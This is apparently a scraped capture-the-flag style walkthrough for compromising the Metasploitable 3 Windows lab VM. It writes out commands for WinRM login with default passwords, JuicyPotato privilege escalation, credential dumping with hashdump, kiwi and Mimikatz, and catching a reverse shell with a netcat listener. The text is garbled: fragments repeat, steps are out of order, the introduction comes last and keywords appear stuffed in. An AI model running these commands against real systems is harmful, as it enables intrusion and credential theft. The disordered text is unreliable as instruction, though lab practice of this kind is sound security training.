Metasploitable 3 Windows Walkthrough ✦ High-Quality
# Install evil-winrm gem install evil-winrm evil-winrm -i 192.168.56.102 -u administrator -p vagrant
gobuster dir -u http://192.168.56.102 -w /usr/share/wordlists/dirb/common.txt Look for /jenkins or /phpmyadmin . Metasploitable 3 often has Jenkins running on port 80 via a virtual directory. If you find Jenkins, navigate there. The credentials in Metasploitable 3 default to admin / admin (or no password). metasploitable 3 windows walkthrough
Invoke-Command -ScriptBlock { C:\temp\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\temp\priv.txt" -t * } If successful, SYSTEM. You are now SYSTEM or Administrator . Your mission: Own the forest. Method A: Meterpreter (If you used MSF) meterpreter > hashdump # Or meterpreter > load kiwi meterpreter > creds_all Method B: Mimikatz via PowerShell If you are in a native shell (Evil-WinRM or cmd): # Install evil-winrm gem install evil-winrm evil-winrm -i
upload JuicyPotato.exe C:\temp\ Then run: The credentials in Metasploitable 3 default to admin
dir /s /b C:\*flag* dir /s /b C:\*proof* Usually located in C:\flags\ or C:\Users\Administrator\Desktop\proof.txt . "EternalBlue crashes the machine!" Metasploitable 3 is notoriously unstable under heavy SMB exploits. Solution: Don't use EternalBlue. Use exploit/windows/smb/ms17_010_psexec instead, which is less aggressive, or stick to WinRM. "I can't access port 445 from Kali." Windows Firewall might be blocking it. Revert the VM snapshot. Metasploitable 3 resets firewall rules on boot, but sometimes virtualization interfaces change. Ensure both VMs are on the exact same Host-Only adapter. "The Jenkins console is locked." The default credentials changed. Check the build.log from when you created the VM. Alternatively, try admin:admin , vagrant:vagrant , or blank. "My reverse shell isn't connecting." Windows Firewall is blocking inbound connections, but outbound is usually open. Ensure your Kali listener ( nc -lvnp 4444 ) is running. Use LHOST=192.168.56.101 and ensure no host firewall on Kali is blocking. Conclusion: What Did We Learn? This walkthrough of Metasploitable 3 Windows demonstrates a critical truth: Complex exploits (EternalBlue) are cool, but simple misconfigurations (WinRM with weak passwords) are how real breaches happen.
This walkthrough will guide you from initial reconnaissance to full system control. We will use Kali Linux as our attack platform and target .